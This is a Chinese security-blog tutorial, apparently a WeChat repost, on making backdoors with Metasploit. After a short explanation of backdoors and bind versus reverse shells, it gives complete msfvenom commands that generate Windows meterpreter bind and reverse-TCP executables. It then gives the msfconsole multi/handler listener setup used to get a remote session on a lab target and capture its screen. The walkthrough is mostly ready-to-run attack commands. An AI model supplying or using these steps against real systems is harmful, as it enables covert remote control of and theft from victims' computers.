msf制作后门

admin 2022年4月19日23:21:06评论125 views字数 1407阅读4分41秒阅读模式


1
、什么是后门?

后门,是一个系统的作者故意留下的、只有作者自己知道的机关

比如,一个洞府看起来是铜墙铁壁,但是若在它前面前念一声"芝麻开门!"便会在墙壁上凭空打开一个门。这便是一个后门,这是系统的作者故意留下的机关。

再比如,打开手机拨号键盘,正常使用的话就可以拨打电话。但是,若连续输入 *#06# ,变进入了特殊的处理程序: 显示当前手机序列号。这也是一个后门,是系统作者故意留下的手段。

可见,普通人无法看到后门的存在,但系统的作者知道后门在哪里。在输入特殊的指令后,便打开了后门,进入特殊的处理分支。注意重点: 只有作者自己知道这个指令!



2、简单说说后门的2种获取Shell方式?


就是控制端监听在某TCP/UDP端口,被控制端主动连接控制端的这一端口,控制端可以通过这一端口进行相关命令操作。像telnet,ssh这些可以理解为正向shell,控制端主动连通控制端,而反向shell则是正向shell的向。

正向shell:控制端主动发起连接去连接被控制端。
反向shell:被控制端主动连接控制端。

3、如何制作后门?


如何制作正向连接后门?使用如下命令

msfvenom -p windows/meterpreter/bind_tcp -f exe -o backdoor.exe


#msfvenom(msf不用说,venom是古老而又经典著名的免杀方式)-p(选择payload,也就是攻击荷载)windows/meterpreter/bind_tcp(正向payload目录)-f exe(生成方式为exe)-o backdoor.exe(输出名称为backdoor.exe)

msf制作后门

msf制作后门


生成成功,默认保存在/root/下。

msf制作后门

如何制作反向后门?使用如下命令

msfvenom -p windows/meterpreter/reverse_tcp -f exe -o backdoorfanxiang.exe


#细心的同学已经看出来了,大致没什么不一样,就是换了个payload,换了个输出名。payload必须换,输出名字不必须,只是为了区分。


4、如何使用后门?


如何使用正向后门?将后门上传至靶机。

 

msf制作后门


运行它,再去kali上加载、配置监听模块,才能入侵靶机。配置命令如下


msfconsole #进入msf
use /exploit/multi/handler #加载监听模块set payload windows/meterpreter/bind_tcp #设置payload为此正向payloadset rhost 192.168.203.137 #将远程主机地址设置为靶机ipexploit或者run #运行模块


可以看到入侵成功,最后为了证明成功,我是用screenshot命令截了一张靶机的屏幕保存在/root/

msf制作后门


msf制作后门


msf制作后门




如何使用反向后门?将后门上传至靶机。


 

msf制作后门


先不要运行。先准备好监听模块再运行!


msfconsole  #进入msfuse /exploit/multi/handler  #加载监听模块set payload windows/meterpreter/reverse_tcp  #设置payload为此反向payloadifconfig  #查看KaliLinux的ip地址set lhost 192.168.203.136  #因为是反向,让靶机主动连接我们,所以设置自己的ipexploit或者run #开始运行监听模块

msf制作后门

之后运行 后门文件此时返回

msf制作后门


msf制作后门


原文始发于微信公众号(盐酸网络安全):msf制作后门

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月19日23:21:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   msf制作后门http://cn-sec.com/archives/591935.html

发表评论

匿名网友 填写信息